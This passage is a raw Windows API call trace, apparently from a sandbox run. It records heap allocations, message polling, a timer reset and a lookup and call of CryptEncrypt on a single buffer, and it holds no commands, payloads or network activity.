| out: hHeap=0x970000) returned 1 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0231.299] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0231.299] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0231.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0231.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0231.300] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.300] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.300] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0231.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0231.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0231.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0231.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0231.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0231.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0231.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0231.341] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0231.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0231.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0231.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 1 [0231.341] TranslateMessage (lpMsg=0x8cef58) returned 0 [0231.341] DispatchMessageW (lpMsg=0x8cef58) returned 0x0 [0231.342] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0231.342] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0231.342] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0231.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0231.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0231.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0231.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0231.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0231.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0231.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0231.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0231.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0231.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0231.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0231.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0231.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0231.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0231.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0231.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad28) returned 0x2f34fa8 [0231.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34fa8 | out: hHeap=0x970000) returned 1 [0231.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0231.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0231.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0231.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56588 [0231.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0231.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0231.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0231.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0231.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0231.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0231.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0231.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0231.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0231.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51388, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0231.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0231.349] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0231.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.349] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xad28, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xad30) returned 1 [0231.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0231.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.350] CharLowerBuffW (in: lpsz="byte[44336]", cchLength=0xb | out: lpsz="byte[44336]") returned 0xb [0231.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.357] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0231.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0231.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0231.357] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0231.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0231.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0231.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0231.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0231.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0231.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0231.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0231.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0231.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 